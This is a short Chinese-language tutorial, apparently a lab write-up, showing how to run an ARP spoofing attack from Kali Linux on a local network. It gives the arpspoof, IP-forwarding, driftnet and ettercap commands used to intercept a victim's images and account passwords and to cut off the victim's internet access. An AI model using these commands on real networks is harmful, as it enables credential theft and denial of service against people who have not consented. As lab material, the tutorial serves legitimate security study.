Kali ARP欺骗攻击

Kali系统获取局域网内图片和账号密码嗅探及断网攻击

arpspoof 是一款进行arp欺骗的工具，攻击者通过毒化受害者arp缓存，将网关mac替换为攻击者mac，然后攻击者可截获受害者发送和收到的数据包，可获取受害者账户、密码等相关敏感信息。

Kali主机采用虚拟机---桥接模式

受害者主机---windows系列

目标准备

攻击者ip：192.168.1.3
受害者ip：192.168.1.2
网关IP：192.168.1.1

查看网卡口

#ip a

查看192.168.1.3的网卡名，我这台主机叫eth0

开启端口转发

echo 1 >/proc/sys/net/ipv4/ip_forward

开始进行arp攻击

arpspoof -t 192.168.1.2  192.168.1.1  -i eth0

此时kali可拦截相关受害者主机相关信息，开启wireshark拦截受害者ping数据 利用driftnet 窃取受害者网络中传输的图片，图片以小窗口的形式显示

driftnet -i eth0

进行账号密码嗅探

ettercap -Tq -i eth0

开启转发与未开启效果

开启转发功能目标能正常访问互联网

未开启转发无法访问互联网

停止攻击后目标可正常访问互联网

欺骗过程